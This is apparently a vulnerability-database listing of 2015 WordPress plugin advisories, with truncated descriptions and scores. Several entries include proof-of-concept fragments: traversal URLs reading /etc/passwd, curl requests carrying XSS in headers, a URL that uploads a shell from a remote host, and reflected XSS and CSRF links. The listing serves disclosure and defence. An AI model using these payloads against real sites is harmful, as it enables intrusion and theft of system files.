
4359 matches found

wpexploit, added 2015/10/10 12:0 a.m., 19 views

Ajax Load More <= 2.8.1.1 - Authenticated File Upload & Deletion

Authenticated file upload in the file ajax-load-more/admin/admin.php, in the function almsaverepeater. The variable $f is set to a predictable PHP file path, and then the content of the variable $c is written into that file. The following code proves that this second variable is also set from...

Exploits: 0, References: 2

wpexploit, added 2015/09/20 12:0 a.m., 8 views

wordpress vertical image slider plugin < 1.2 - Cross-Site Scripting & CSRF

The lack of CSRF check and sanitisation could allow attackers to perform Cross-Site Scripting attack against logged in administrator, as well as upload arbitrary files XSS via CSRF: alert"XSS"' alert"XSS"' setTimeout'form1.submit', 1; Upload file via CSRF:...

AI score 0.7
Exploits: 0, References: 2

wpexploit, added 2015/09/15 12:0 a.m., 19 views

MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI)

Plugin is still affected and has been closed. Typical local file inclusion vulnerability: from downloadpage.php: I've tried to get RCE but didn't have success reading from /proc/self/environ or /var/log/apache2/access.log include: Failed opening '/proc/self/environ' for inclusion...

CVSS 5, AI score 1.3, EPSS 0.09325
Exploits: 2, References: 1

wpexploit, added 2015/09/15 12:0 a.m., 34 views

WordPress <= 4.3 - Authenticated Shortcode Tags Cross-Site Scripting (XSS)

The following payload placed in a page or post does not work in comments: TEST!!!caption width="1" caption='Click me...

CVSS 4.3, AI score 0.5, EPSS 0.06389
Exploits: 2, References: 3

wpexploit, added 2015/09/14 12:0 a.m., 16 views

EZ SQL Reports <= 4.11.33 - Authenticated Arbitrary File Download

The plugin allows a WordPress site administrator or collaborator to download arbitrary files from the host file system through the plugin functionality of downloading .sql, .sql.zip or .sql.gz files created by the WordPress administrator. The file name to download is not sanitized and path travers...

AI score 0.3
Exploits: 0, References: 1

wpexploit, added 2015/09/14 12:0 a.m., 28 views

EZ SQL Reports <= 4.11.33 - Authenticated Arbitrary Code Execution

There are several calls to "passthru" in the code. One of them receives the username, password, database name and host from the $_POST arguments, so you can inject in each of these parameters the ";" character or others like "&&" or "||" to execute other distinct commands to "/usr/bin/mysql"...

AI score 2.1
Exploits: 0, References: 1

wpexploit, added 2015/09/14 12:0 a.m., 22 views

PowerPress Podcasting < 6.0.5 - Authenticated Cross-Site Scripting (XSS)

By exploiting a Cross-site scripting vulnerability the attacker can hijack a logged in user’s session by stealing cookies. This means that the malicious hacker can change the logged in user’s password and invalidate the session of the victim while the hacker maintains access. 1. Logon into any...

CVSS 3.5, AI score 0.3, EPSS 0.01183
Exploits: 2, References: 2

wpexploit, added 2015/09/14 12:0 a.m., 20 views

Csv2WPeC Coupon <= 1.1 - Unauthenticated Remote File Upload

The code in csv2wpecCouponFileUpload.php does not properly sanitize user input, it checks the file mime-type for type x-php but this can be tricked when using the short code for "; $uploadfile="/var/www/s.pht"; $ch =...

CVSS 5, AI score 0.5, EPSS 0.02043
Exploits: 2, References: 1

wpexploit, added 2015/09/12 12:0 a.m., 14 views

Royal Slider <= 3.2.6 - Authenticated Cross-Site Scripting (XSS)

The vulnerability exists due to insufficient sanitation of user-supplied data in "rstype" HTTP GET parameter when creating / editing a slider. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of...

CVSS 4.3, AI score 1.6, EPSS 0.01156
Exploits: 2, References: 1

wpexploit, added 2015/09/06 12:0 a.m., 19 views

WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The wp-symposium WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/wp-symposium/getalbumitem.php?size=alert/xss/...

CVSS 4.3, AI score 1.1, EPSS 0.03605
Exploits: 2, References: 1

wpexploit, added 2015/08/31 12:0 a.m., 31 views

Thumbnail Carousel Slider < 1.0.1 - Authenticated Shell Upload & CSRF

The original advisory states that this vulnerability is exploitable with editor and author roles but this is incorrect. Only the administrator role by default can trigger this vulnerability. However, CSRF on the image upload form makes this exploitable by a malicious actor. Create a file named...

AI score 0.4
Exploits: 0, References: 1

wpexploit, added 2015/08/21 12:0 a.m., 13 views

SEO Redirection < 2.9 - Authenticated Reflected Cross-Site Scripting (XSS)

The plugin was affected by an Authenticated Reflected Cross-Site Scripting XSS security vulnerability in its settings page, via the search GET parameter https://example.com/wp-admin/options-general.php?page=seo-redirection.php&tab=posts&search=%22+onmouseover%3Dalert%281%29+%3E...

AI score 1.4
Exploits: 0, References: 2

wpexploit, added 2015/08/20 12:0 a.m., 12 views

WP Google Map Plugin < 3.0.0 - CSRF to Authenticated Cross-Site Scripting (XSS)

The lack of CSRF Protection could allow attackers to perform XSS attack against logged in administrators. ' / ' /...

AI score 2.1
Exploits: 0, References: 2

wpexploit, added 2015/08/15 12:0 a.m., 23 views

Google Adsense & Hotel Booking <= 1.0.5 - Open Proxy

Plugin is still affected and has been closed. The code in ./plugin/google-adsense-and-hotel-booking/proxy.php allows an arbitrary user to proxy POST requests through the host site. This may allow attackers to hide attacks, or DoS a site if the POST request is pointed back at itself causing a loop...

CVSS 6.4, AI score 1.8, EPSS 0.02232
Exploits: 2, References: 1

wpexploit, added 2015/08/14 12:0 a.m., 14 views

WP-Polls <= 2.70 - Stored Cross-Site Scripting (XSS)

The /wp-admin/admin.php?page=wp-polls%2Fpolls-add.php page is vulnerable to XSS within the pollqquestion and pollaanswers parameters. Add a new poll with the question or answer as...

AI score 1
Exploits: 0, References: 1

wpexploit, added 2015/08/13 12:0 a.m., 16 views

Hide My WP <= 4.53 - Stored-Cross Site Scripting (XSS)

An attacker can make a fake attack attempt which will be logged, and can inject JavaScript. curl --referer 'you are using bad filtering for input ript alert"XSS here" ript; :; ;' http://example.com...

AI score 0.6
Exploits: 0, References: 1

wpexploit, added 2015/08/09 12:0 a.m., 26 views

WP Symposium <= 15.5.1 - Unauthenticated SQL Injection

WordPress plugin wp-symposium version 15.5.1, and probably all existing previous versions, suffers from an unauthenticated SQL Injection in getalbumitem.php, parameter 'size'. The issue is exploitable even if the plugin is deactivated. PoC URL :...

CVSS 7.5, AI score 1.3, EPSS 0.74127
Exploits: 5, References: 2

wpexploit, added 2015/08/06 12:0 a.m., 19 views

MP3-jPlayer <= 2.4.2 - Full Path Disclosure

The download.php code allows arbitrary users to disclose path information on WordPress sites with this plugin installed. 120 $info = " 121 Get: " . $mp3 . " 122 Sent: " . $sent . " 123 File: " . $file . " 124 Open: " . $SERVER'DOCUMENTROOT' . $fp . " 125 Root: " . $rooturl . " 126 pID: "...

CVSS 5, AI score 1.4, EPSS 0.02093
Exploits: 1, References: 1

wpexploit, added 2015/08/04 12:0 a.m., 18 views

Job Manager <= 0.7.22 - Unauthenticated Stored Cross-Site Scripting (XSS)

The Job Manager WordPress plugin was affected by an Unauthenticated Stored Cross-Site Scripting XSS security vulnerability. Go to the job listings page /index.php/jobs/apply/, then click on "send through your résumé", add the payload '" to the email field. The JavaScript will be executed on the...

CVSS 4.3, AI score 0.6, EPSS 0.0489
Exploits: 6, References: 2

wpexploit, added 2015/08/04 12:0 a.m., 11 views

Admin Pack by SITE CASEIRO <= 1.1 - Authenticated Stored Cross-Site Scripting (XSS)

The admin-pack-by-site-caseiro WordPress plugin was affected by an Authenticated Stored Cross-Site Scripting XSS security vulnerability...

AI score 0.9
Exploits: 0, References: 1

wpexploit, added 2015/08/04 12:0 a.m., 22 views

Ninja Forms <= 2.9.21 - Authenticated Reflected Cross-Site Scripting (XSS)

The Ninja Forms Contact Form – The Drag and Drop Form Builder for WordPress WordPress plugin was affected by an Authenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-admin/admin.php?page=nf-processing&title=alert123;...

AI score 0.7
Exploits: 0, References: 2

wpexploit, added 2015/08/04 12:0 a.m., 21 views

Altos Connect Widget <= 1.3.0 - Unauthenticated Cross-Site Scripting (XSS)

The altos-connect WordPress plugin was affected by an Unauthenticated Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/altos-connect/jquery-validate/demo/demo/captcha/index.php/"alert1...

CVSS 4.3, AI score 1, EPSS 0.01103
Exploits: 2, References: 1

wpexploit, added 2015/08/02 12:0 a.m., 13 views

recent-backups <= 0.7 - Remote File Download

Plugin is still affected and has been closed. The code in download-file.php does not verify if the user is logged in or sanitize which files can be downloaded. This vulnerability can be used to download sensitive system files, such as the Linux passwd file. $ curl -v...

CVSS 5, AI score 1.4, EPSS 0.03854
Exploits: 1, References: 3

wpexploit, added 2015/08/02 12:0 a.m., 23 views

simple-image-manipulator <= 1.0 - Remote File Download

Plugin is still affected and has been closed. In ./simple-image-manipulator/controller/download.php no checks are made to authenticate the user or sanitize input when determining file location. $ curl...

CVSS 5, AI score 1.6, EPSS 0.07038
Exploits: 2, References: 2

wpexploit, added 2015/07/27 12:0 a.m., 13 views

Hide My WP <= 4.51.1 - Stored Cross-Site Scripting (XSS)

An attacker can make a fake attack attempt, with a JavaScripting payload, which will be logged by the plugin, resulting in XSS. The attacker also can spoof their IP address in the logs by setting the X-FORWARDED-FOR header. curl --referer ' // :; ;' --header 'X-FORWARDED-FOR: 8.8.8.8'...

AI score 0.1
Exploits: 0, References: 1

wpexploit, added 2015/07/25 12:0 a.m., 9 views

Music Store <= 1.0.14 - Referer Header Open Redirect

The Music Store – WordPress eCommerce WordPress plugin was affected by a Referer Header Open Redirect security vulnerability. GET /wp-content/plugins/music-store/ms-core/ms-submit.php HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language:...

AI score 0.4
Exploits: 0, References: 3

wpexploit, added 2015/07/23 12:0 a.m., 41 views

WordPress <= 4.2.2 - Authenticated Stored Cross-Site Scripting (XSS)

Description Authenticated Cross-Site Scripting XSS in post/page text editor mode. Editor user and up. link...

CVSS 4, AI score 6, EPSS 0.08814
Exploits: 1, References: 3

wpexploit, added 2015/07/18 12:0 a.m., 24 views

wptf-image-gallery 1.0.3 - Remote File Download

Plugin is still affected and has been closed. The ./wptf-image-gallery/lib-mbox/ajaxload.php code doesn't sanitize user input or check that a user is authorized to download files. This allows an unauthenticated user to download sensitive system files: 1 $ curl...

CVSS 5, AI score 1.2, EPSS 0.02277
Exploits: 2, References: 2

wpexploit, added 2015/07/16 12:0 a.m., 12 views

Download Manager <= 2.7.94 - Authenticated Stored XSS

The stored XSS vulnerability allows any authenticated user to inject malicious code via the name of the uploaded file: Example: .jpg The vulnerability exists because the file name is not properly sanitized and this can lead to malicious code injection that will be executed on the target’s browser...

AI score 6.4
Exploits: 0, References: 2

wpexploit, added 2015/07/12 12:0 a.m., 16 views

Candidate Application Form <= 1.3 - Unauthenticated Arbitrary File Download

Plugin is still affected and has been closed. The code in downloadpdffile.php does not do any sanity checks, allowing a remote attacker to download sensitive system files. $ curl...

CVSS 5, AI score 2.5, EPSS 0.08833
Exploits: 1, References: 3

wpexploit, added 2015/07/10 12:0 a.m., 17 views

Fast Image Adder <= 1.1 - Unauthenticated Remote File Upload

The fast-image-adder WordPress plugin was affected by an Unauthenticated Remote File Upload security vulnerability. $ curl http://www.example.com/wp-content/plugins/fast-image-adder/fast-image-adder-uploader.php?confirm=url&url=http://sitewithshellstodl/shell.php Shell location is reported back t...

CVSS 5, AI score 0.7, EPSS 0.02996
Exploits: 2, References: 2

wpexploit, added 2015/07/10 12:0 a.m., 30 views

IBS Mappro <= 0.6 - Directory Traversal

The ibs-mappro WordPress plugin was affected by a Directory Traversal security vulnerability. http://www.example.com/wp-content/plugins/ibs-mappro/lib/download.php?file=/etc/passwd...

CVSS 7.8, AI score 2.8, EPSS 0.03263
Exploits: 2, References: 2

wpexploit, added 2015/07/07 12:0 a.m., 15 views

Floating Social Bar <= 1.1.5 - Cross-Site Scripting (XSS)

The Floating Social Bar WordPress plugin was affected by a Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-admin/admin-ajax.php?action=fsbsaveorder&items1="alert"XSS";...

CVSS 4.3, AI score 0.5, EPSS 0.02067
Exploits: 2, References: 2

wpexploit, added 2015/07/07 12:0 a.m., 40 views

NewStatPress <= 1.0.4 - SQL Injection

The Search functionality is susceptible to a SQL Injection attack due to usage of user input without sanitation. In particular, at line 98 of 'includes/nspsearch.php'. Utilising a specially crafted SQL query, we can trigger disclosure of user hashes through an IMG tag as the data channel. The...

CVSS 7.5, AI score 0.2, EPSS 0.01815
Exploits: 1, References: 1

wpexploit, added 2015/07/07 12:0 a.m., 37 views

NewStatPress <= 1.0.4 - Reflected Cross-Site Scripting (XSS)

The NewStatPress plugin uses several variables from the $_GET scope, without sanitization, on lines 28 and 31 of the file ‘includes/nspsearch.php’. While WordPress automatically escapes quotes on this scope, the outputs on these lines are outside of quotes, and as such can be utilized to trigger ...

CVSS 4.3, AI score 0.5, EPSS 0.01879
Exploits: 1, References: 1

wpexploit, added 2015/07/05 12:0 a.m., 14 views

Image Export <= 1.1.0 - Directory Traversal

The image-export WordPress plugin was affected by a Directory Traversal security vulnerability. $ curl http://www.example.com/wp-content/plugins/image-export/download.php?file=/etc/passwd...

AI score 2.2
Exploits: 0, References: 2

wpexploit, added 2015/07/05 12:0 a.m., 33 views

WP e-Commerce Shop Styling <= 2.5 - Local File Inclusion

The code in ./wp-ecommerce-shop-styling/includes/download.php does not sanitise user input to prevent sensitive system files from being downloaded. You'll have to rename the download file via mv -- -..-..-..-..-..-..-..-..-etc-passwd passwd as the filename is set to the download filename with pat...

CVSS 5, AI score 0.7, EPSS 0.24093
Exploits: 2, References: 5

wpexploit, added 2015/07/05 12:0 a.m., 20 views

StageShow <= 5.0.8 - Open Redirect

The StageShow WordPress plugin was affected by an Open Redirect security vulnerability. http://www.example.com/wp-content/plugins/stageshow/stageshowredirect.php?url=http%3A%2F%2F2buntu.com...

CVSS 6.4, AI score 1.8, EPSS 0.06283
Exploits: 2, References: 3

wpexploit, added 2015/07/03 12:0 a.m., 16 views

Swim Team <= v1.44.10777 - Local File Inclusion

The code in ./wp-swimteam/include/user/download.php doesn't sanitize user input from downloading sensitive system files. $ curl...

CVSS 5, AI score 0.9, EPSS 0.32714
Exploits: 2, References: 3

wpexploit, added 2015/07/02 12:0 a.m., 17 views

MDC YouTube Downloader <= 2.1.0 - Local File Inclusion

The MDC YouTube Downloader WordPress plugin was affected by a Local File Inclusion security vulnerability. http://www.example.com/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd...

CVSS 5, AI score 7.5, EPSS 0.10148
Exploits: 2, References: 3

wpexploit, added 2015/06/30 12:0 a.m., 13 views

WP-CopyProtect <= 3.0.0 - CSRF & Stored Cross-Site Scripting (XSS)

The WP-CopyProtect Protect your blog posts plugin for WordPress is vulnerable to a Persistent XSS attack on the settings screen, due to a lack of sanitation of user input, and lack of Cross-Site Request Forgery CSRF token nonce. alert1'/ document.getElementById"form".submit;...

AI score 0.7
Exploits: 0, References: 1

wpexploit, added 2015/06/26 12:0 a.m., 14 views

Multiple Themes - Privilege Escalation

The themes suffer from a privilege escalation vulnerability, any authenticated user can trigger this vulnerability due to weak permissions checking. An attacker can update options, such as changing user's default role, registration state and others, which may lead to executing commands/code on th...

CVSS 6.5, AI score 1.1, EPSS 0.01488
Exploits: 3, References: 2

wpexploit, added 2015/06/25 12:0 a.m., 16 views

WP Mobile Detector <= 3.2 - Stored Cross-Site Scripting (XSS)

The WP Mobile Detector plugin exposes the AJAX action ‘websitezoptions’ to all registered users on line 78 of wp-mobile-detector/websitez-wp-mobile-detector.php. Providing specially crafted form values will result in a Persistent XSS attack on Mobile visitors. import requests s = requests.session...

AI score 0.8
Exploits: 0, References: 1

wpexploit, added 2015/06/23 12:0 a.m., 14 views

wp-instance-rename <= 1.0 - Arbitrary File Download

The wp-instance-rename WordPress plugin was affected by an Arbitrary File Download security vulnerability. url --data "dbname=wp&dumpfname=/etc/passwd&backupfolder=." http://www.example.com/wp-instance-rename/mysqldumpdownload.php -o p.zip...

CVSS 5, AI score 1.6, EPSS 0.02851
Exploits: 3, References: 2

wpexploit, added 2015/06/18 12:0 a.m., 34 views

Erident Custom Login & Dashboard 3.4-3.4.1 - Stored Cross-Site Scripting (XSS)

The Erident Custom Login and Dashboard plugin exposes a call to the updateoption method, when a specific POST field is posted to the plugins setting screen. No CSRF token is used, and as such if an Administrative user can be tricked into visiting a site with a malicious form, it is possible to...

CVSS 6.8, AI score 0.1, EPSS 0.00674
Exploits: 1, References: 1

wpexploit, added 2015/06/18 12:0 a.m., 19 views

Ultimate Member 1.2.98-1.2.994 - Reflected Cross-Site Scripting (XSS)

The Ultimate Member plugin utilizes the Redux Framework. The Redux Framework includes a script named ‘class.p.php’, which acts as a HTTP proxy. Utilizing this script, it is possible to trigger a Reflected XSS attack, by loading data from a location controlled by the attacker. The data from this...

Exploits: 0, References: 1

wpexploit, added 2015/06/15 12:0 a.m., 12 views

Users to CSV <= 1.4.5 - Cross-Site Request Forgery (CSRF)

The users-to-csv WordPress plugin was affected by a Cross-Site Request Forgery CSRF security vulnerability. http://www.example.com/wp-admin/users.php?page=users2csv.php&csv=true&table=users http://www.example.com/wp-admin/users.php?page=users2csv.php&csv=true&table=comments...

AI score 3.6
Exploits: 0, References: 2

wpexploit, added 2015/06/12 12:0 a.m., 29 views

Yoast SEO <= 2.1.1 - Authenticated Stored DOM XSS

The "snippet preview" functionality of the Yoast WordPress SEO plugin was susceptible to cross-site scripting in versions before 2.2. Vulnerable URL: /wp-admin/post-new.php?posttitle= Vulnerable Code wordpress-seo/js/wp-seo-metabox.js: function ystcleanstr if str == '' || str == undefined return...

CVSS 4.3, AI score 0.5, EPSS 0.03206
Exploits: 2, References: 1

wpexploit, added 2015/06/12 12:0 a.m., 14 views

Zip Attachments <= 1.1.4 - Arbitrary File Download

The zip-attachments plugin allows arbitrary file downloads because it does not check the download path of the requested file. http://www.example.com/wp-content/plugins/zip-attachments/download.php?zafile=../../../../../etc/passwd&zafilename=passwd...

CVSS 5, AI score 1.9, EPSS 0.15646
Exploits: 2, References: 1

wpexploit, added 2015/06/10 12:0 a.m., 24 views

Smart Website Tools by AddThis 4.0.6-5.0.2 - Stored XSS

The Smart Website Tools by AddThis plugin exposes an AJAX function called 'atasyncloading' in 'addthis/addthis-for-wordpress.php'. Access to this function is restricted to Registered users, however is not restricted to Administrative users, meaning that anyone with an account on the target site c...

AI score 0.1
Exploits: 0, References: 2

Total number of security vulnerabilities: 4359